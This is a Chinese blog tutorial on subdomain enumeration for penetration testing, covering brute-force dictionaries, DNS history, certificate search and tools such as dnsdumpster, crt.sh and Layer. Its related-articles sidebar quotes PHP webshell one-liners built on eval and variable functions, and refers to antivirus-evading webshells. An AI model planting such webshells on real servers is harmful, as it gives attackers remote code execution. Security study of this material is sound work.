信息搜集-子域名挖掘

最新推荐文章于 2024-06-08 10:04:53 发布
最新推荐文章于 2024-06-08 10:04:53 发布
阅读量5.2k 收藏 30
点赞数 4
分类专栏: 信息搜集笔记 文章标签: web安全 信息搜集
本文链接:https://blog.csdn.net/weixin_43221560/article/details/109118270
版权

作者:小刚
一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢
本实验仅用于信息防御教学,切勿用于其它用途

子域名挖掘

域名

域名有级别之分,可以分为顶级域名(一级域名)、二级域名、三级域名、多级域名
二级三级和多级则是此网站的子域名
举个例子啊
顶级域名:pornhub.com
二级域名:www.pornhub.com; rtsp.pornhub.com;fr.pornhub.com
三级域名:ams.upload.pornhub.com
多级域名以此类推~

为什么要收集子域名?
通常来说,一个网站的主站防御力非常强的,而他们的非主站则相对较弱,俗话说苍蝇不叮无缝的蛋柿子还得挑软的捏,我们通过收集的子域名进行扩大攻击范围,从子站入手,进一步渗透测试更加容易成功。

收集原理

1.字典爆破
字典爆破就是通过收集来的字典,拼接到顶级域名前面,然后通过自动化工具进行访问,判断返回结果,从而跑出子域名是否存在。
爆破处理接货主要是依赖于字典的精准度,一本好的字典可以让你事半功倍。

2.DNS信息收集
DNS原理就是搜集DNS的解析历史,通过查询dns记录来获取到对方的解析记录,从而获取到子域名,正常来说你的域名经DNS解析过一般就会搜到。

3.证书查询
通过HTTPS 证书,ssl证书等搜集子域名记录。

4.爬虫提取子域名
可以利用爬虫从页面源代码中提取子域名。

网站和工具

在这介绍我平时用到搜索子域名的网站和工具。

为啥要用好几个工具?
当你的字典精度不高时,你搜集的信息是不完整的,我的方法是通过网站和本地跑字典,然后去重整合结果

1.在线子域名查询https://phpinfo.me/domain/

使用比较多的一个在线爆破子域名网站。
在这里插入图片描述

2.一会儿~ https://dns.bufferover.run/dns?q=

一款DNS在线查询网站,需要在url后面拼接所要收集的网站
在这里插入图片描述

3. https://dnsdumpster.com/

dns侦查和研究,查找和查找dns记录
在这里插入图片描述

4.快速DNS rapiddns.io/subdomain

在这里插入图片描述

5.crt.sh 证书查询

https://crt.sh/
一款通过证书查询子域名的网站
在这里插入图片描述

4.Layer子域名挖掘机

一款非常好用的Win平台工具
在这里插入图片描述

总结

最好找几个比较好的网站和工具,最后将结果去重组合,这样的子域名查询比较全面。

获得Layer子域名挖掘机
可关注微信公众号:XG小刚
回复:Layer子域名挖掘机
在这里插入图片描述

XG小刚
关注
  • 4
    点赞
  • 30
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
信息收集——域名信息获取
海纳百川
02-08 2723
文章目录一、域名介绍1. 域名定义2. 域名与IP二、收集域名信息1. 利用whois查询2. ICP备案查询三、收集子域名子域名挖掘工具: 一、域名介绍 1. 域名定义 域名(Domain Name),又称网域,是由一串用点分隔的名字组成的Internet上某一台计算机或计算机组的名称,用于在数据传输时对计算机的定位标识。 2. 域名与IP 当我们访问一个网址时,我们既可以通过它的域名进行访问,...
【渗透测试--信息收集】
m0_63241485的博客
08-15 718
信息收集对于渗透测试前期来说是非常重要的,因为只有我们掌握了目标网站或目标主机足够多的信息之后,我们才能更好地对其进行漏洞检测。正所谓,知己知彼百战百胜!目标资产信息搜集的程度,决定渗透过程的复杂程度。目标主机信息搜集的深度,决定后渗透权限持续把控。渗透的本质是信息搜集,而信息搜集整理为后续的情报跟进提供了强大的保证。...
探索网络的密匙——dnsdumpster工具深度解析
最新发布
gitblog_00009的博客
06-08 899
探索网络的密匙——dnsdumpster工具深度解析 项目地址:https://gitcode.com/nmmapper/dnsdumpster 在数字化时代的浪潮中,网络安全信息侦察成为了攻防两端的焦点。为了助力信息安全专家和网络管理员更好地掌握目标网络的面貌,一款名为dnsdumpster的开源工具应运而生。今天,我们将深入探索这款工具的强大功能,揭示其在安全审计和网络管理中的独特价值。 项...
PHP一句话木马免杀学习
qq_45780190的博客
05-11 3072
PHP一句话木马免杀学习 简单了解php一句话木马原理 <?php @eval($_POST['shell']);?> 首先存在一个名为shell的变量,shell的取值为HTTP的POST方式。Web服务器对shell取值以后,然后通过eval()函数执行shell里面的内容。 将以上代码写入webshell.php文件中然后放在站点目录下通过浏览器访问,以POST方式传入shell=phpinfo(); 一句话木马的变形 常用变形函数 convert_uudecode() #解码一个
渗透测试 | 域名信息收集
尼泊罗河伯的博客
11-05 1231
信息收集可以说是在渗透测试中最重要的一部分,上文对 IP 信息收集做了一个简要的叙述,认识了 CDN 技术和网络空间搜索引擎。但是很多网站的主站因为访问流量过大的原因通常会使用 CDN 技术,同时也可以有效防止 DDOS 攻击。在域名信息收集时,主要是因为一些网站的主站过于强大,一时间没有过多的思路。这时如果进行了域名信息收集,发现其有很多分站,那么就有利于渗透测试的进行,毕竟分站越多,网站的漏洞存在可能性就越大。
Web信息收集(非常全)
qq_50854662的博客
02-27 2141
Web信息收集(非常全)
免杀一句话
weixin_45647970的博客
03-25 333
<?php array_map($_GET[func], array($_POST[cmd])); ?> 利用方式http://localhost/dvwa/hackable/uploads/nb.php?func=assert 密码为cmd ----------------------------------------------------------------------------------------- <?php $_GET['a']($_POST['b']);
域名信息收集--渗透测试
weixin_45300266的博客
01-16 3712
一、域名简介: 二、子域名查询 三、注册信息查询 四、备案信息查询
很好用的子域名信息收集工具----子域名挖掘机.rar
12-06
信息收集阶段,子域名挖掘是非常关键的步骤,因为它可以揭示出目标公司的业务范围、内部网络结构以及可能存在的未公开服务。通过这种方式,安全专家能够识别出可能被忽视的安全风险,例如未保护的服务器、测试环境...
子域名收集——Layer子域名挖掘
12-26
"Layer子域名挖掘机"是一款专为此目的设计的强大工具,它能够帮助用户找到目标网站可能存在的所有子域名,从而扩大攻击面或进行安全评估。 Layer子域名挖掘机的核心功能在于其字典驱动的扫描方式。字典文件(如提供...
子域名信息收集.zip
12-25
Layer-子域名挖掘机 knock dnsrecon dnsenum 1子域名信息.md Sublist3r subDomainsBrute SubdomainCollector subdomain3 subbrute OneForAll Layer-子域名挖掘机 knock dnsrecon dnsenum 1子域名信息.md Sublist3r ...
PHP一句话 免杀版
10-23
PHP一句话 免杀版
PHP大马过狗代码.php
05-31
该文件为PHP代码的大马,通过该文件,可以很好的绕过安全狗的检测,进而链接服务器。相关链接为https://download.csdn.net/download/wychy2008/10318498
子域名挖掘机5.0修改版 Layer
05-06
子域名挖掘信息安全过程中的一个关键步骤,主要涉及以下知识点: 1. **DNS解析**:DNS(Domain Name System)是互联网上的名字解析系统,负责将域名转换为IP地址。在子域名挖掘中,我们利用DNS查询来寻找与主域名...
子域名挖掘机5.1最新版
03-28
在网络安全审计中,子域名挖掘信息收集的重要步骤,它有助于识别潜在的安全风险,比如未加密的服务、过时的系统或者公开的敏感数据。同时,它也是渗透测试中情报收集阶段的关键工具,帮助测试者建立更全面的攻击面...
免杀学习——PHP免杀
ZxC789456302的博客
10-23 1751
php上马免杀,理论上是只要绕过waf就可以,但特殊情况下存在驻场人员手动监控,看到一些奇怪的参就直接给你ban了,所以各位师傅尽量不要在一些敏感时期进行渗透测试,仅用于技术学习推荐大家去看一下这位师傅的文章php免杀合集 - 跳跳糖 (tttang.com),里面还有一些扩展,十分详细。
域名信息收集
m0_56065966的博客
02-04 134
轻松查询域名信息
信息收集之子域名收集
cdyunaq的博客
05-12 2628
上一次我们分享了主域名收集的思路和方法,但除了主域名外,子域名也是域名信息收集中的一个重要环节,在当今各种防护设备满天飞的情况下,想要拿下主域名越来越难,但我们可以使用迂回策略,从子域名下手,慢慢靠近主域名以达到shell的目的。 子域名收集可以帮助我们发现目标对外开放的更多的资产,如果能找到一些被遗忘或目标不关注的子域名,将其作为突破点,可能达到事半功倍的效果。 子域名收集的方式很多,但如何尽可能全的收集到所有的子域名却不是那么容易的事儿;本次将从手工和工具两种方式为大家进行讲解。 手工操作 证书
laoyer子域名挖掘
10-11
laoer子域名挖掘机是一种用于获取和收集互联网中子域名信息的工具。子域名是主域名下的一个分支,可以用于指向特定的网站或应用程序。通过挖掘子域名,我们可以更全面地了解一个网站的结构和相关信息。 laoer子域名挖掘机可以帮助用户快速找到一个网站的全部子域名,并提供有关这些子域名信息,比如IP地址、端口号等。这样一来,用户可以更好地了解一个网站的整体情况,同时也可以发现一些可能存在的漏洞或安全隐患。 laoer子域名挖掘机的工作原理通常是通过枚举域名的各种可能组合,从而发现新的子域名。它可以使用多种方法,如基于字典的攻击、模糊查询、递归查询等。用户可以根据自己的需求和目的选择不同的挖掘方式和设置参数。 使用laoer子域名挖掘机有多种应用场景。首先,它可以用于网站管理和维护,帮助管理员了解和控制整个网站的子域名,确保网站的正常运行和安全性。其次,它也可以用于网络安全研究和渗透测试,帮助分析人员找出潜在的安全风险和漏洞,提高系统的安全性。另外,它还可以用于情报收集和竞争情报分析,帮助企业了解竞争对手的网站架构和业务情况。 总的来说,laoer子域名挖掘机是一种功能强大的工具,可以帮助用户了解和掌握互联网中的子域名信息,提高网站的管理和安全性。它在各种场景下都具有重要的应用价值。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值